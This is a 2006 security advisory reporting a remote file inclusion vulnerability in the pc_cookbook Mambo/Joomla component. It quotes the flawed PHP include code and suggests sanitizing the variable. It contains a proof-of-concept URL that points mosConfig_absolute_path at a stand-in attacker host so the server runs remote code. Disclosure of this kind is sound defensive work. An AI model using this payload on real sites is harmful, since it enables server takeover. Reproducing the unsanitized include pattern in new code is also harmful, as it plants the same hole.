[ECHO_ADV_37$2006] pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities

Mon, 10 Jul 2006 10:58:53 -0700 

\_   _____/\_   ___ \ /   |   \\_____  \

 |    __)_ /    \  \//    ~    \/   |   \

 |        \\     \___\    Y    /    |    \

/_______  / \______  /\___|_  /\_______  /

        \/         \/       \/         \/

 

                                        .OR.ID

ECHO_ADV_37$2006


-----------------------------------------------------------------------------------------------


[ECHO_ADV_37$2006] pc_cookbook Mambo/Joomla Component <= v0.3 Remote File 
Include Vulnerabilities

-----------------------------------------------------------------------------------------------


 

Author          : Ahmad Maulana a.k.a Matdhule

Date            : July 10th 2006

Location        : Indonesia, Jakarta

Web             : http://advisories.echo.or.id/adv/adv37-matdhule-2006.txt

Critical Lvl    : Highly critical

Impact          : System access

Where           : From Remote

------------------------------------------------------------------------


 

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pc_cookbook Component

 

Application     : pc_cookbook Component

version         : 0.3

URL             : http://www.dianthos.net & http://www.fisheye.gr/koyansblog

 

------------------------------------------------------------------------


 

Vulnerability:

~~~~~~~~~~~~~~~

 

in folder com_pccookbook we found vulnerability script pccookbook.php.

 

-----------------------pccookbook.php----------------------

....

<?php

//pc_cookbook Component//

/**

* Content code

* @package hello_world

* Original @Copyright (C) 2005 Robert Prince

* @Copyright (C) 2005 Konstantinos (koyan) Kokkorogiannis

* @ All rights reserved

* @ pc_cookbook is Free Software

* @ Released under GNU/GPL License :

http://www.gnu.org/copyleft/gpl.html

* @version koyans 0.3

 * @link http://www.dianthos.net & http://www.fisheye.gr/koyansblog

**/

global $mosConfig_absolute_path;

global $mosConfig_live_site;

 

 // include language file, or default to english

 if (file_exists ($mosConfig_absolute_path .

'/components/com_pccookbook/languages/' . $mosConfig_lang . '.php')) {

            include_once ($mosConfig_absolute_path .

'/components/com_pccookbook/languages/' . $mosConfig_lang . '.php');

 } else {

            include_once ($mosConfig_absolute_path .

'/components/com_pccookbook/languages/english.php');

 } // end if

        ?>

...

----------------------------------------------------------

 

Variables $mosConfig_absolute_path are not properly sanitized. When

register_globals=on

and allow_fopenurl=on an attacker can exploit this vulnerability with a

simple php injection script.

 

Proof Of Concept:

~~~~~~~~~~~~~~~~

 

http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfi

g_absolute_path=http://attacker.com/evil.txt?

 

Solution:

~~~~~~~~

 

sanitize variabel $mosConfig_absolute_path in pccookbook.php

 

 

------------------------------------------------------------------------

---

Shoutz:

~~~~~~

~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson :)

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous

~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama

~ [EMAIL PROTECTED], [EMAIL PROTECTED]

~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net

------------------------------------------------------------------------

---

Contact:

~~~~~~~

 

     matdhule[at]gmail[dot]com

     

-------------------------------- [ EOF ]----------------------------------

Reply via email to